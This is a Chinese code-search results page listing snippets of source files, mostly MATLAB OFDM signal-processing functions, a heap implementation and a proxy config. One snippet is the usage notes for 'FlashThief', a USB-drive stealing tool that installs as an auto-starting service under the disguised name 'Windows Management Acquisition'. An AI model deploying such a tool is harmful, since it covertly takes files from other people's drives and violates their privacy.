代码搜索:INTERVAL
找到约 8,094 项符合「INTERVAL」的源代码
代码结果 8,094
www.eeworm.com/read/318655/13474217
txt 使用说明.txt
FlashThief U盘小偷
本程序以服务形式运行。当然,双击它也是开始监听了……
安装服务:FlashThief.exe -install
卸载服务:FlashThief.exe -uninstall
安装服务后,默认启动方式为自动启动。你要安装后就运行,请使用
net start "Windows Management Acquisition"
www.eeworm.com/read/317647/13500280
m girem.m
% Function 4-4
% girem.m
%
% Function to remove guard interval from received signal
%
% Programmed by T.Yamamura and H.Harada
%
function [iout,qout]= girem(idata,qdata,fftlen2,gilen,nd);
%
www.eeworm.com/read/317647/13500289
m interwave.m
% Function 4-10
% interwave.m
%
% Function to add interference wave
%
% Programmed by T.Yamamura and H.Harada
%
function [iout,qout]=interwave(ci,spow,ml,nsamp,tstp,fadingpara);
%*********
www.eeworm.com/read/315441/13542534
ini config.ini
[PROXY]
url=http://www.hbhanrui.com/ip
username=test
proxy=0
interval=80
[SERVER]
serverport=8000
ConNum=2
[FIRE]
canreg=0
[REG]
path=F:\控件\RemoteUDP\DbAnyWhere开发套件\服务器\reg.key
www.eeworm.com/read/314474/13566561
cc intervalheap.cc
/*
* IntervalHeap.cc --
* Heap implementation with both min and max retrieval/removal functions
*
* Contributed by Dustin Hillard (hillard@ssli.ee.washington.edu)
*
*/
#ifndef _IntervalHeap_cc_
www.eeworm.com/read/313956/13577904
m loweq.m
function xl=loweq(x,ts,f0)
% xl=loweq(x,ts,f0)
%LOWEQ Returns the lowpass equivalent of the signal x.
% f0 is the center frequency.
% ts is the sampling interval.
%
t=[0:ts:ts*(length(x)-1
www.eeworm.com/read/313956/13577950
m loweq.m
function xl=loweq(x,ts,f0)
% xl=loweq(x,ts,f0)
%LOWEQ Returns the lowpass equivalent of the signal x.
% f0 is the center frequency.
% ts is the sampling interval.
%
t=[0:ts:ts*(length(x)-1
www.eeworm.com/read/313950/13578536
m girem.m
% Function 4-4
% girem.m
%
% Function to remove guard interval from received signal
%
% Programmed by T.Yamamura and H.Harada
%
function [iout,qout]= girem(idata,qdata,fftlen2,gilen,nd);
%
www.eeworm.com/read/313950/13578544
m interwave.m
% Function 4-10
% interwave.m
%
% Function to add interference wave
%
% Programmed by T.Yamamura and H.Harada
%
function [iout,qout]=interwave(ci,spow,ml,nsamp,tstp,fadingpara);
%*********
www.eeworm.com/read/312589/13608592
m loweq.m
function xl=loweq(x,ts,f0)
% xl=loweq(x,ts,f0)
%LOWEQ Returns the lowpass equivalent of the signal x.
% f0 is the center frequency.
% ts is the sampling interval.
%
t=[0:ts:ts*(length(x)-1